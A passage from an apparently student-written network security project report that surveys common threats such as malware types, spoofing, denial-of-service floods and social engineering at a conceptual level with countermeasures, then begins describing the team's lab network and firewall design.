at or are about to leave a Network Layer endpoint (which could be an end host, a
gateway, a router, or a firewall). When an incoming packet arrives from the network , the
security endpoint first determines the processing it requires:
- If the packet is not protected, should it be accepted? This is essentially the "traditional"
packet filtering problem, as performed, e.g., by network firewalls.
- If the packet was encapsulated under the security protocol:
Is there correct key material (usually contained in a data structure called a “security
association") required to decapsulate it? Should the resulting packet (after decapsulation)
be accepted?
A second stage of packet filtering occurs at this point. Notice that a packet may be
successfully decapsulated and still not be accepted (e.g., a decapsulated packet might
contain an illegal network source IP address such as 127.0.0.1).
A security endpoint makes similar decisions when an outgoing packet is ready to be sent:
- Is there a security association (SA) that should be applied to this packet?
If there are several applicable SAs, which one should be selected?

38
- If there is no SA available, how should the packet be handled? It may be forwarded to
some network interface, dropped, or queued until an SA is made available, possibly after
triggering some automated key management mechanism such as the IPSEC ISAKMP
protocol.
Observe that because these questions are asked on packet-by-packet basis, policy filtering
must be performed, and any related security transforms applied, quickly enough to keep
up with network data rates. This implies that in all but the slowest network environments
there is insufficient time to process elaborate security languages, perform public key
operations, consult large tables, or resolve rule conflicts in any sophisticated manner.
Implementations of Network Layer Security services, including IPSEC and most
firewalls, therefore, usually employ very simple, filter-based languages for configuring
their packet-handling policies. In general, these languages specify routing rules for
handling packets that match bit patterns in packet headers, based on such parameters as
incoming and outgoing addresses and ports, services, packet options, etc.

2.6 Internal Network Security
Although focusing on securing the network’s perimeter is important, securing it internally
is equally important. If by some way a hacker manages to get in the network, he should
not be able to wander around easily without getting caught. Therefore, one should apply
the following to make the internal network secure:

39
• Patch and update all PCs before they are connected to the network, and then on a
regular basis. Note that patches need to be tested to avoid having problems with
databases or applications [3].
• System administrators should use one-time passwords only. In this way, in case a
hacker cracks the Admin’s password, it would only be valid for this one session.
An example of one-time password mechanism is the secur-ID by RSA [3].
• When an application is installed, some service accounts may be created. They are
accounts which do not have a human user associated to them. These accounts are
assigned default passwords that will most likely never be changed. Therefore, it is
important for an administrator to regularly change these passwords and monitor
the logs of these service accounts.
• Monitoring of logs is important: administrators should regularly read the logs to
monitor any unusual use of an account. Many freeware tools (such as log-IDS by
Adam Richard [3]) can help decipher the logs (which otherwise are almost
impossible to read) in something that the administrator can understand. Moreover,
by using a centralized syslog server, it will be much more difficult for hackers to
access them and edit them.
• Also, available freeware such as EventAlarm are useful when the Administrator
want to monitor a user’s logging in and out in a fast way. Such a freeware gives
pop out screen alarms to the administrator whenever user X or Y logs on or off.
Moreover, this freeware can be licensed and additional options could be added so
that alarms are given in various situations.

40
• Segregating the network can reduce vulnerabilities. In this way, a user will have
specific privileges and would not be able to access all parts of the networks (like
vital servers, or other department’s files). So if ever a hacker cracks a user ID and
password, less damage will be made if there is segregation: he won’t be able to
access the whole network.
If these rules are properly followed in our FYP, potential problems can be lessened
whether coming from a hacker that’s got in, or a legal user that has bad intentions.
2.7 Survey of Most Common Threats
We will begin explaining attacks automated by malicious code then we will explain
hacker attacks not automated by malicious code. DoS attacks will constitute a section on
their own due to the fact they are the most widespread attack on the Internet. We will end
this section by an explanation of social engineering attacks.

2.7.1 Attacks Automated by Malicious Codes
Malicious code is a piece of software which can damage or alter data and programs on a
system without permission and notice of the user. The sequence of instructions are used
to intentionally cause adverse affects to the system.

41

Figure 2.2: Classification of malicious code


We can see from the above figure that there are two types of malicious codes: needs host
program and independent. Needs host program are fragments of programs that can not
exist independently of some actual application program, utility or system program.
Independents are self contained programs that can be run by the operating system.
1. Trojan Horse
A Trojan horse is a malicious, security breaking program that is disguised as something
benign, such as a game, a directory lister or an archiver. The software is wrapped together
with the malicious code into a single file or program. The program appears to be
performing a useful function but it may also be quietly performing some harmful or
unwanted action such as deleting the victim’s files. The malicious code is typically a
back door, also known as an illicit server, but it can be a virus, worm or any other kind of
code that allows the attacker to do damage. The software is joined together with the

42
malicious code into a single file. Common ways to spread Trojan Horses are email, IRC
(Internet Relay Chat), and websites. An example of a Trojan horse file is: openme.gif.exe
(an extension is added to a seemingly harmless file). When the Trojan horse is executed it
will start its malicious job. If the job consist of planting a back door the attacker will be
notified (by email or IRC). Now the attacker can use the victim computer as a zombie in
a DDoS (Distributed Denial of Service; explained in a separate section later) attack to
flood a target system. The attacker can also remotely control the infected computer (open
the CD-ROM, send messages, open websites, reboot, listen to the microphone input,
delete files). The two most famous software to create back doors are BackOrrifice and
NetBUS. The backdoors are sent to the victim as Trojan horses (disguised as a harmless
program).
2. Virus
The virus is the most common type of malicious code. It can infect systems by attaching
itself to files and programs. Just like its biological counterpart, it needs a host to infect. A
virus is usually a program that needs to be executed by a user before it can do any
damage. For example, a virus attached to an email message is usually only harmful when
a user opens the attachment. Unlike a worm, a virus can not infect other computers
without assistance. It is propagated for example by humans trading programs with their
friends or by E-mail. The virus might only propagate itself and then allow the program to
run normally (without doing further damage). However, usually, after propagating
silently for a while, it starts doing things like writing cute messages on the terminal or
playing strange tricks with the display or even in extreme cases nuking the entire user’s
files.

43
So in summary the four phases of the life of a virus (after being executed) are:
The dormant phase (not all viruses have this stage): The virus is idle the virus will
eventually be activated by some event, such as a date, the presence of another program or
file, or the capacity of the disk exceeding some limit.
The propagation phase: The virus places an identical copy of itself into other programs or
into certain system areas on the disk. Each infected program will now contain a clone of
the virus, which will itself enter a propagation phase.
The triggering phase: The virus is activated to perform the function for which it was
intended. As with the dormant phase, the triggering phase can be caused by a variety of
system events such as a count of the number of times the virus has copied itself.
The execution phase: The function is performed. The function may be harmless, such as a
message on the screen, or damaging, such as the destruction of programs and data files.
There are also different types of computer viruses:

Figure 2.3: Main types of viruses



Memory-resident virus: Lodges in main memory as part of a resident system program.
From that point on, the virus infects every program that executes.

44
Program file virus: This is the most common type of virus; it attaches itself to executable
files such as .EXE and .COM. The file acts as a carrier and when the file is executed or
opened, the malicious code executes and the virus spreads to infect other files.


Figure 2.4 Program File Virus


Polymorphic virus: This type of virus has the ability to change its signature to avoid
detection by anti-virus software. It attempts to trick anti-virus software by slightly
modifying its own code when it spreads to other files. A polymorphic virus can modify
itself by encrypting or compressing part of its code.
Boot Sector Virus: This type of virus attaches itself to the boot sector of a floppy or hard
disk. When the computer boots, the virus will reside in its memory and infect other disks.
Modern main boards provide a BIOS option to enable boot sector virus protection, which
basically prevents modifications to the boot sector.
Stealth Virus: This type of virus attempts to hide itself to avoid detection by anti-virus
software. It attempts to misguide services that used to detect the virus. When the infected
file or boot sector is scanned by anti-virus software, the virus attempts to return the
properties of the original clean version of the file or boot sector.

45
Macro Virus: Macro viruses exploit vulnerabilities inherent to macro languages such as
Visual Basic in Microsoft Office. This type of virus is often found in Word documents.
When a user opens the document the malicious code is executed.
Email Virus: A more recent development in malicious software is the e-mail virus.
Rapidly spreading e-mail viruses make use of a Microsoft Word macro embedded in an
attachment. If the recipient opens the e-mail attachment, the Microsoft Word macro is
activated then: the e-mail virus sends itself to everyone on the mailing list in the user’s e-
mail package and the virus does local damage.
3. Worm
A worm is similar to a virus but there is one main important difference: a worm doesn’t
need to attach itself to a file or program to be reproduced and executed as a virus does. A
worm is self-contained, it can replicate itself and infect entire networks. Because of the
recursive structure of the propagation, the spread rate of worms is very fast and poses a
big threat on the Internet infrastructure as a whole. Examples of Worms are:
MyDoom,
Netsky, Bagle, Blaster, Code Red, Nimda.
4. Logic Bomb
A logic bomb is a smart piece of malicious code that executes only when certain
conditions are met; it is triggered when a certain event occurs. An example is a virus that
executes on April Fool’s day (but infected the system long before that date) or a
format.exe command that is executed only when the user logs on with administrative
permissions. Another example of a logic bomb sends a note to the hacker when the
infected computer is on the internet and runs a specific application such as MS Word.

46
This bomb does not actually begin the attack but tells the hacker that the victim has met
needed state for an attack to begin.


Figure 2.5: Logic Bomb


1. Attacker implants logic bomb
2. Victim reports installation
3. Attacker sends attack message
Countermeasures against malicious code: Prevention and detection of malicious code
typically involves anti-virus and other detection products at gateways, mail servers, and
workstations. Those products generally scan messages for known signatures of a variety
of malicious code, or potentially dangerous behavioral characteristics. Differences
between products exist in detection capabilities and the range of malicious code included
in their signatures. Detection products should not be relied upon to detect all malicious
code. Additionally, anti-virus and other products that rely on signatures generally are
ineffective when the malicious code is encrypted. For example, VPNs, IPSec, and
encrypted e-mail will all shield malicious code from detection. Heuristic anti-virus
products generally execute code in a protected area of the host to analyze and detect any
hostile intent. Heuristic products are meant to defend against previously unknown or

47
disguised malicious code. Malicious code may be blocked at the firewall or gateway. For
example, a general strategy might be to block all executable e-mail attachments, as well
as any Active-X or Java applets. A more refined strategy might block based on certain
characteristics of known code. Protection of servers involves examining input from users
and only accepting that input which is expected. This activity is called filtering. If
filtering is not employed, a Web site visitor, for instance, could employ an attack that
inserts code into a response form, causing the server to perform certain actions. Those
actions could include changing or deleting data and initiating fund transfers. Protection
from malicious code also involves limiting the capabilities of the servers and Web
applications to only include functions necessary to support operations. An additional
detection control involves network and host intrusion detection devices. Network
intrusion detection devices can be tuned to alert when known malicious code attacks
occur. Host intrusion detection can be tuned to alert when they recognize abnormal
system behavior, the presence of unexpected files, and changes to other files.
2.7.2 Hackers Attacks (not automated by malicious codes)
1.
Eavesdropping

The name eavesdropping comes from the fact that this technique involves secretly
listening to the data traveling through the attacked network. Other names for
eavesdropping include sniffing and snooping. Eavesdropping is only possible because
most data sent through connections are sent as plaintext and are unencrypted. Thus, a
hacker can just listen to the connection stream between the two connected users and get
whatever information he needs. This method is usually employed by those who are
unwilling to take large risks as this method is a very low-risk method. There is almost no

48
chance of getting caught when this method is used as no intrusion is involved and the
hacker can back off quickly without a trace if anything goes wrong. This method is also
used for those who want to listen to what is shared between two people, be it secret data
or just a personal conversation. In this respect, this method is the best for spies and
blackmailers.[14]
2. IP spoofing
Most networks and operating systems use the IP address of a computer to identify a valid
entity. In certain cases, it is possible for an IP address to be falsely assumed (identity
spoofing). An attacker might also use special programs to construct IP packets that
appear to originate from valid addresses inside the corporate intranet. After gaining
access to the network with a valid IP address, the attacker can modify, reroute, or delete
your data. The attack may be directed to a specific computer addressed as though it is
from that same computer. This may make the computer think that it is talking to itself.
This may cause some operating systems such as Windows to crash or lock up.
3. Man in the middle attack
As the name indicates, a man-in-the-middle attack occurs when someone between you
and the person with whom you are communicating is actively monitoring, capturing, and
controlling your communication transparently. For example, the attacker can re-route a
data exchange. When computers are communicating at low levels of the network layer,
the computers might not be able to determine with whom they are exchanging data.
Session hijacking occurs through the following scenario. First, the attacker watches a
session open on a network. Once authentication is complete, he attacks the client
computer to disable it, and use IP spoofing to claim to be the client who was just

49
authenticated and steal the session. Man-in-the-middle attacks are like someone assuming
your identity in order to read your message. The person on the other end might believe it
is you because the attacker might be actively replying as you to keep the exchange going
and gain more information.
Countermeasure: This attack can be prevented if the two legitimate systems share a
secret which is checked periodically during the session.
4. Server spoofing
A C2MYAZZ utility can be run on Windows 95 stations to request LANMAN (The
LanMan password hash is used by Windows NT for authenticating users locally and over
the network [16]) authentication from the client. The attacker will run this utility while
acting like the server while the user attempts to login. If the client is tricked into sending
LANMAN authentication, the attacker can read their username and password from the
network packets sent. [15]
Countermeasure: New operating systems are not vulnerable.
5. DNS poisoning
This is an attack where DNS information is falsified. This attack can succeed under the
right conditions, but may not be real practical as an attack form. The attacker will send
incorrect DNS information which can cause traffic to be diverted. The DNS information
can be falsified since name servers do not verify the source of a DNS reply. When a DNS
request is sent, an attacker can send a false DNS reply with additional bogus information
which the requesting DNS server may cache. This attack can be used to divert users from
a correct web server such as a bank and capture information from customers when they
attempt to logon. [15]

50
6. Password cracking
Sometimes in case of a partial break-in, the encrypted password file of a company might
be exposed to a hacker (or cracker in that case). If it happens, the attacker will start
password cracking the file, namely trying all the possible combinations with the idea to
find the weakest passwords and gain privileges later on. [17]
Countermeasure: In case the company is aware that its passwords' file has been
compromised, it should immediately notify all employees to change their passwords, so
even if weak passwords are exposed, they wouldn't be valid ones anymore. However, if
the company is not aware of its password file exposure, it should constantly try to crack
its password file just like an attacker would do and filter out the weakest passwords.
2.7.3 DoS
A DoS (
Denial of Service)
attack is an attempt to prevent legitimate users of a service or
network resource from accessing that service or resource. DoS attacks are not targeted at
stealing, modifying or deleting information.. A DoS attack comes in many forms like
cutting of the power to a system or flooding a system with seemingly legitimate network
traffic, anything that will results in a denial of service. DoS attacks usually make use of
software bugs to crash or freeze a service or network resource, or bandwidth limits by
making use of a flood attack to saturate all bandwidth.
Different methods of DoS:
• DoS
DoS attack is when the attacker launches an attack from his or her own computer, this
is done by sending packets of data to the remote computer, for each packet sent the
target machine receives one. This is a very uncommon form of denial of service

51
because the attack most of the time is very unsuccessful and at times can be easily
traced. DoS attacks are usually carried out by amateur script kiddies.


Figure 2.6: DoS


• DDoS
A distributed denial of service attack is when an attacker attacks from multiple source
systems. DDoS attack is generally more effective to bring down huge corporate sites
than DoS attacks. The attacker can put in order a large number of computers to
connect to a website at the same time. The web server has a maximum allowed
number of client connections. If this number is attained, the server will deny further
connections. So there will be a denial of service. Usually the attacker does not own all
these computers so he uses Trojan horses with back doors as malicious code to infect
computers which become zombies (also called “secondary victims”). The users of the
infected computers are not aware that their computers are used in a DDoS attack. DoS
bots (small word for robot, program for flooding present on the secondary victims
computer) usually have standard flooding, such as ICMP, UDP, TCP, and SYN
Flooding. The Internet services and resources under the attack are “primary victims”.

52
A typical DDoS attack consists of master, slave, and victim. Master being the
attacker, slave being the compromised systems and victim being the attacker’s target.

Figure 2.7: DDoS Attack



• DRDoS
DRDoS is when an attacker sets his bots to flood different intermediate hosts with
spoofed packets. For example the attacker sets half his bots to flood yahoo.com with
spoofed ICMP packets and half ebay.com with spoofed ICMP packets. The spoofed
packets seem to have microsoft.com as a source so yahoo.com and ebay.com flood
microsoft.com (ebay.com and yahoo.com will reply to the spoofed source). For each
packet the attacker sends to yahoo.com or ebay.com, yahoo.com or ebay.com may
have thousands of machines on the same IP Address. Each of these machines will
reply to the spoofed ICMP packet therefore amplifying the power of the attack
greatly.

53

Figure 2.8: DRDoS- Red Lines: Connection from attacker computer to zombies computers. Blue
Lines: Zombies sending spoofed ICMP packets. The ICMP packets look like they come from the
Internet Core router the attacker wants to attack. Green Lines: Each of the computers connected to
ebay.com, yahoo.com, cnn.com and Amazon.com are replying to the spoofed ICMP packets therefore
flooding the Internet core router.



54

Figure 2.9 DRDoS- Malicious SYN packets are being "Reflected" off innocent TCP servers. Their
SYN/ACK responses are being used to flood and attack the target network.


There are also different Types of DoS Attacks:
• TCP SYN Flood Attack
A TCP session is established by using a
three-way handshake
mechanism, which
allows the client and the host to synchronize the connection and agree upon the initial
sequence numbers. When the client connects to the host, it sends a SYN request to
establish and synchronize the connection. The host replies with a SYN / ACK, again
to synchronize. Then the client acknowledges it received the SYN/ ACK packet by
sending and ACK. When the host receives the ACK the connection will become
OPEN, allowing traffic from both sides (full-duplex). The connection remains open

55
until the client or the host issues a FIN or RST packet, or the connection times out. If
you flood a remote computer with SYN packets it is going to send back a SYN/ACK
packet so bandwidth will be wasted. In addition, in a TCP SYN flood attack the
connection is not completed so the target computer is left waiting for an ACK,
therefore it is possible to max out the remote computers connection queue.
Connections from legitimate users will be rejected in this case. The amount of
bandwidth this attack uses is very minimal, although if done on a very large scale it
could affect the bandwidth of a web server.

Figure 2.10: TCP 3 way handshake



Countermeasure: Many routers and other network nodes today are able to detect SYN
floods by monitoring the amount of unacknowledged TCP sessions and kill them
before the session queue is full. They can often be configured to set the maximum
allowed number of half-open connections, and limit the amount of time the host waits
for the final acknowledgement. Without these preventive measures, the server could
eventually run out of memory, causing it to crash entirely.
• UDP Flood Attack

56
UDP flooding is when the attacker sends garbage packets from UDP port(s) to UDP
port(s) on the remote computer, since UDP is a connectionless protocol (no
handshake mechanism) UDP flooding can be very effective

and easy to abuse for
flood attacks. A common type of UDP flood attack often referred to as a
Pepsi attack
,
is an attack in which the attacker sends a large number of forged UDP packets to
random diagnostic ports on a target host. The CPU time, memory, and bandwidth
required to process these packets may cause the target to become unavailable for
legitimate users.
Countermeasure: To minimize the risk of a UDP flood attack, disable all unused
UDP services on hosts and block the unused UDP ports if you use a firewall to
protect your network.
• Ping of Death Attack
An oversized ICMP datagram (size larger than 65,535 bytes) can crash IP devices that
were made before 1996 (Windows 95, NT4).
Countermeasure: Modern operating systems and network devices safely disregard
these oversized packets. Older systems can usually be updated with a patch.
• Smurf Attack
An attack where a ping request is sent to a broadcast network address with the
sending address spoofed so many ping replies will come back to the victim and
overload the ability of the victim to process the replies. This attack is made possible
mostly because of badly configured network devices that respond to ICMP echoes
sent to broadcast addresses. The amount of traffic sent by the attacker is multiplied by

57
a factor equal to the number of hosts behind the router that reply to the ICMP echo
packets.

Figure 2.11: Smurf Attack
Besides the target system, the intermediate router is also a victim, and thus also the
hosts in the bounce site. A similar attack that uses UDP echo packets instead of ICMP
echo packets is called a Fraggle attack.
Countermeasure: It is difficult to prevent Smurf attacks entirely because they are
made possible by incorrectly configured networks from a third party. The Smurf
Amplifier Registry (SAR) http://www.powertech.no/smurf/ Netscan.org is one of
several publicly available databases that can be used to configure routers and
firewalls to block ICMP traffic from these networks. The Smurf Amplifier Registry
(SAR) can be downloaded in Cisco ACL format. If you use Cisco routers, make sure
all interfaces are configured with the no ip-directed broadcast command (default
since IOS 12.0).



58
• Teardrop Attack
A normal packet is sent then a second packet is sent which has a fragmentation offset
claiming to be inside the first fragment. This second fragment is too small to even
extend outside the first fragment. This may cause an unexpected error condition to
occur on the victim host which can cause a buffer overflow and possible system crash
on many operating systems. [15]
Countermeasure: Today’s implementations of the TCP/IP stack safely disregard such
invalid packets.
2.7.4 Social Engineering
Before an attacker attempts to gain access to a secured system, he must first know certain
things about the target system. Although an attacker often uses technology, he may
simply try to ask for the information. If the right person asks, he or she will often get it all
too easily.
Social Engineering is the art of having people do what you want, or give you info on
passwords and almost anything, without them knowing they are doing so. Social
Engineering applies to every aspect of the internet and also to the real world.
This can start with a simple chat in a chat room or a phone call to a business that
someone wants to maybe gain access too from the internet without having to hack in. In a
business situation of social engineering, the hacker starts doing research on the company
so he will most likely know every department that the company has. He could then try to
phone up a department and say he was a member of the IT department and that the
passwords are being changed for routine security reasons then he would tell the user to
change his/her password to what ever he wants. He could then simply logon to their
system using the new password and he’s in.

59
A social engineering attack usually involves an attacker impersonating a seemingly
harmless person to deceive company personnel to obtain information. Obtaining that
information may be the actual goal itself, or it may be used to aid the attacker in
penetrating a secured system. The information can be a user ID, password, access code
and other type of sensitive information, but can also be information that seems harmless
to share. A company phoned by a student conducting a survey about which operating
systems and software they use may actually be giving valuable information to a malicious
attacker. Malevolent competitors and ex-employees who want to settle a score, sabotage a
business, or steal a company secret often use social engineering techniques to reach their
malicious goals.
Social engineering attacks are often more complicated and require careful preparation,
acting and persuasion skills. A social engineer collects bits and pieces of information that
will lead him to his goal, typically using its most valuable tool, a phone. Calling a
company and bluntly ask for the information may alarm the employee on the other side of
the phone and ruin the entire attack before it really got started. So before the attacker can
persuade a victim to simply hand out information, he needs to crawl into the skin of
someone the victim will gladly give the information to, someone who works in the same
company for example. To do that he needs to know the company’s lingo, department
structure, internal phone numbers, and anything else that will make him an “insider”.
Once the attacker talks the talk, knows who to impersonate and who to ask what, it is just
a matter of asking the right questions without raising any suspicion to get everything he
wants.

60
Social engineers have found a relatively new way to attempt to obtain sensitive
information from naïve people, without having to pay them a visit or call them by phone:
email. The attacker sends malicious e-mail messages that seem to be legit and even have
a valid sender address. The message may contain a link that takes the victim to a website
that looks exactly like a site where he or she frequently buys online products with a credit
card number. Or the message may seem to have been sent by the IT department, and
includes an attachment that is supposedly the latest anti-virus update that must be
installed immediately. In reality, the attachment could be a Trojan horse creating a
backdoor for the attacker or logging keystrokes that are sent to the attacker by e-mail.
The most important thing in social engineering is building trust. If a hacker builds up
some trust with a user then he is going to find it easier to manipulate him to do what he
wants.
Countermeasure: Many companies acknowledged the necessity of technology such as
firewalls, intrusion detection systems, and advanced authentication systems to secure
their information. However, this technology does not make them less vulnerable to a
social engineer. It may actually lead to a false sense of security, which may make them an
even easier target. To prevent successful social engineering attacks security policies must
be implemented and enforced. All employees must be informed and trained to recognize
and appropriately respond to a potential social engineering attack.
One of the most important policies that should be implemented is verification of requests.
Not only the identity of the requestor should be verified, but also the request he or she is
making. A simple method to verify the caller’s ID is to call the person back at the phone
number listed in the company’s phone directory. If someone outside the company asks for

61
inside information, he or she should be forwarded to a manager or the Information
Security department. When a copier maintenance person enters a building, the
receptionist should verify the appointment and ask for an ID.
The best defense against social engineering attacks by e-mail is using certificates for
encrypting and signing e-mail messages, allowing a recipient to positively identify the
sender.
By following some basic rules and using common sense, most social engineering attacks
can be prevented. It is essential to educate employees about these types of attacks and the
methods of a social engineer, because in any security system people are really the
weakest link.

62
3. Our Network Design
We now tackle the design part of our FYP, i.e. building our Network.
Mr. Ziad Shaaban, from the computer labs, provided our team with 4 Pentium3
computers (that we will place in Mr. Khaled Joujou’s lab). Therefore, we agreed with Mr/
Majari that our network will include: one Windows and one UNIX workstation, in
addition to one windows and one UNIX server.
3.1 Topology
The network topology refers to its shape, or its layout. The topology defines how nodes
are connected to each others and how they communicate between them [8]. The figure
below illustrates the most common network topologies.

Figure 3.1: Network Topologies [8]


As was described in section 1 of this report, the most common topologies businesses use
are hierarchal stared networks. Therefore, we have decided to use this kind of topology
when building our network, since the ultimate goal is to simulate we are a business firm.

63
3.2 Securing the Perimeter
The most common way of implementing Perimeter Security is using Firewalls [9]. A
large array of Firewall exist today, each brand (and even each model within brand) focus
on better security for a given networked environment. From a hacker’s perspective, there
are numerous targets: Router, Switches, Hosts, Application, but also the network as a
whole (DoS attacks).
Firewalls are hardware devices (though some software firewalls exist), that filter
information coming through and out of a secured network. Firewalls generally use the
following methods to do their job [10]:

Packet filtering - Packets (small chunks of data) are analyzed against a set of
filters. Packets that make it through the filters are sent to the requesting system
and all others are discarded.

Proxy service - Information from the Internet is retrieved by the firewall and then
sent to the requesting system and vice versa.

Stateful inspection - A newer method that doesn't examine the contents of each
packet but instead compares certain key parts of the packet to a database of
trusted information. Information traveling from inside the firewall to the outside is
monitored for specific defining characteristics, and then incoming information is
compared to these characteristics. If the comparison yields a reasonable match,
the information is allowed through. Otherwise it is discarded.
Some common Firewall Filters (for inside-to-outside protection) are [11]:

64

IP addresses - For example, if a certain IP address outside the company is reading
too many files from a server, the firewall can block all traffic to or from that IP
address.

Domain names - A company might block all access to certain domain names, or
allow access only to specific domain names.

Protocols - A company might set up only one or two machines to handle a
specific protocol and ban that protocol on all other machines. Protocols include:
IP, TCP, HTTP, FTP, UDP, ICMP, SMTP, SNMP, Telnet…

Ports - Any server machine makes its services available to the Internet using
numbered ports, one for each service that is available on the server. For example,
if a server machine is running a Web (HTTP) server and an FTP server, the Web
server would typically be available on port-80, and the FTP server would be
available on port 21. A company might block port-21 access on all machines but
one inside the company.

Specific words and phrases
- This can be anything. The firewall will sniff (search
through) each packet of information for an exact match of the text listed in the
filter and block any packet with the word or phrase.
Firewalls can protect or help protect us (with additional hardware and software) from
(outside-to-inside security):

Remote login
- When someone is able to connect to your computer and control it
in some form. This can range from being able to view or access your files to
actually running programs on your computer.

65

Application backdoors
- Some programs have special features that allow for
remote access. Others contain bugs that provide a backdoor or hidden access,
which provides some level of control of the program.

SMTP session hijacking